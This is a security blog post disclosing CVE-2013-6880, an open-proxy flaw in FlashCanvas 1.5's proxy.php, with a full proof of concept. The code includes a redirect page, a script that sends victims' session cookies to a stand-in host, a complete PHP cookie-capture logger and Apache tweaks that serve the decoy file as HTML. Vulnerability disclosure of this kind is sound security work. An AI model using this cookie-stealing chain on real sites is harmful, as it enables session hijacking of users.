Marc Wickenden recently discovered a security issue within FlashCanvas 1.5 that could lead to a number of issues, such as cross-site scripting. The issue has been assigned CVE number 2013-6880 and the vendor has now released a fix for the issue, which can be found here. In this blog post we take a closer look at the issue and the proof of concept that shows how this issue can be used to steal session tokens.
Vulnerable code
The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.
Within the proxy.php file the offending code is:
if (!preg_match('#/flash\d*canvas\.swf$#', $_SERVER['HTTP_REFERER'])) {
Creating the exploit
In order to exploit this issue the user needs to already be logged in to the target site and the attacker needs control of a website that can serve a page ending in /flashcanvas.swf
Our malicious /flashcanvas.swf makes a call to the vulnerable proxy.php on the remote site. An attacker entices a victim user to click on a malicious link. This makes a request, for example via a redirect, to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL and renders this in the context of the target site. Page rewrite, script execution, you name it, it becomes possible from this point.
POC
We have generated a POC to prove this and can use the flaw to steal session cookies of a victim under the following scenario. In order to exploit this issue the attacker needs control of a website (lets call this delivery.com), that can serve a page ending in /flashcanvas.swf
We then use the following code to make a call to the vulnerable proxy.php on the remote site (lets call this target.com) and redirect the user to our evil site (evil.com). We used a completely separate host in order to ensure this was cross-domain.
On delivery.com we need the following:
-- flashcanvas.swf <!DOCTYPE html> <html> <head> <title>CVE 2013 6880 POC</title> <meta http-equiv="refresh" content="1;http://www.target.com/FlashCanvas/proxy.php?url=http://evil.com/xss.html"> </head> <body> <p>Redirecting...</p> </body> </html> -- On the evil.com site our script looks like this:
<script>location.href = 'http://delivery.com/capture.php?cookie='+document.cookie;</script>
The capture.php file on delivery.com is used to record and print out the information sent to the page. It is also included in the access logs of course. For completeness the capture.php is:
<?php $date = date("dmY"); $timestamp = date("D M j G:i:s T Y"); $collectionfile = "/tmp/collection.$date"; $fh = fopen($collectionfile, "a"); $ip = $_SERVER['REMOTE_ADDR']; fwrite($fh, "== $timestamp / $ip ==\n"); ?> <html> <body> <?php if (isset($_GET)) { fwrite($fh, "== GET ==\n"); foreach ($_GET as $k => $v) { $arr = explode(";", $v); foreach ($arr as $vv) { $vals = explode("=", $vv); print "<p>$vals[0]: $vals[1]</p>"; } fwrite($fh, "$k:$v\n"); } } if (isset($_POST)) { fwrite($fh, "== POST ==\n"); foreach ($_POST as $k => $v) { fwrite($fh, "$k:$v\n"); print "$k: $v\n"; } }
fclose($fh); ?> </body> </html>
Summary
In summary, an attacker entices a victim user to click on the malicious link (http://delivery.com/flashcanvas.swf). This makes a request, in our case we used a redirect to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL (http://evil.com/xss.html) and renders this in the context of the target.com site, including script execution and DOM functionality.
Note
By default, under Apache the .swf extension will be served as Shockwave Flash. We require this to be served as a page, so this requires the following configuration changes on the evil.com webserver:
Comment out the following line on /etc/mime.types:
#application/x-shockwave-flash swf swfl In your apache configuration, change the following file /etc/apache2/mods-enabled/mime.conf and add:
AddType text/html .swf
Don’t forget to reload apache.